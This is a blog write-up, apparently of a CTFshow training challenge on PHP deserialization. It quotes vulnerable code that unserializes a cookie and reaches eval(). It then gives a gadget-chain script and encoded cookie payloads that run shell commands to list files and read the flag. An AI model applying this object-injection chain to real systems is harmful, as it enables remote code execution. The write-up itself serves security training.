CTFshow-Web入门-反序列化-257题

1、先代码审计

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

根据逻辑要求:

  • 用户名密码要求一致;
  • __construct()魔术方法中实例化的类需要改为backDoor
  • backDoor中的有RCE,那么需要自定义$code,读取目录,读取文件内容

2、保留有效部分,构造链

<?php
class ctfShowUser{
    public function __construct(){
        $this->class=new backDoor();
    }

}


class backDoor{
    private $code="system('ls ./');";
}
echo urlencode(serialize(new ctfShowUser()));

payload:

url:?username=xxxxxx&password=xxxxxx

cookie(读取目录):O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A16%3A%22system%28%27ls+.%2F%27%29%3B%22%3B%7D%7D

image-20241211095225433

cookie(读取文件):O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27tac+flag.php%27%29%3B%22%3B%7D%7D

image-20241211095332131
posted @ 2025-12-03 09:32  shinianyunyan  阅读(6)  评论(0)    收藏  举报